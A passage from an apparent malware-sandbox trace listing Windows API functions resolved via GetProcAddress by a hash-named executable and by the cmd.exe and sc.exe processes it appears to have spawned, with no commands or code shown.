\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005780)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005824)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005824)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004136)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006064)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006064)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006040)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle 